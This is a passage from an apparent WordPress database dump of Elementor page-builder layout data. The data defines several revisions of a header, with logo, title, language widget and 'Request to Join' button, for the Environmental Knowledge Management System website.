046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.5379999999999967030817060731351375579833984375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":24.969999999999998863131622783839702606201171875,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\"},\"elements\":[{\"id\":\"70e8569\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Site Language: [gtranslate]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3da615e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"},{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(19511,2857,'_elementor_version','2.7.5'),(19512,2857,'_elementor_template_type','wp-post'),(19516,2858,'_wp_page_template','elementor_canvas'),(19517,2858,'_elementor_edit_mode','builder'),(19518,2858,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.558999999999997498889570124447345733642578125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.949000000000001620037437533028423786163330078125,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\"},\"elements\":[{\"id\":\"3da615e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"},{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(19519,2858,'_elementor_version','2.7.5'),(19520,2858,'_elementor_template_type','wp-post'),(19524,2859,'_wp_page_template','elementor_canvas'),(19525,2859,'_elementor_edit_mode','builder'),(19526,2859,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.558999999999997498889570124447345733642578125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.949000000000001620037437533028423786163330078125,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\",\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"3da615e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"},{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(19527,2859,'_elementor_version','2.7.5'),(19528,2859,'_elementor_template_type','wp-post'),(19532,2860,'_wp_page_template','elementor_canvas'),(19533,2860,'_elementor_edit_mode','builder'),(19534,2860,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":53.87700000000000244426701101474463939666748046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":17.522999999999999687361196265555918216705322265625,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\",\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"903e33e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Site Language:\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3da615e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\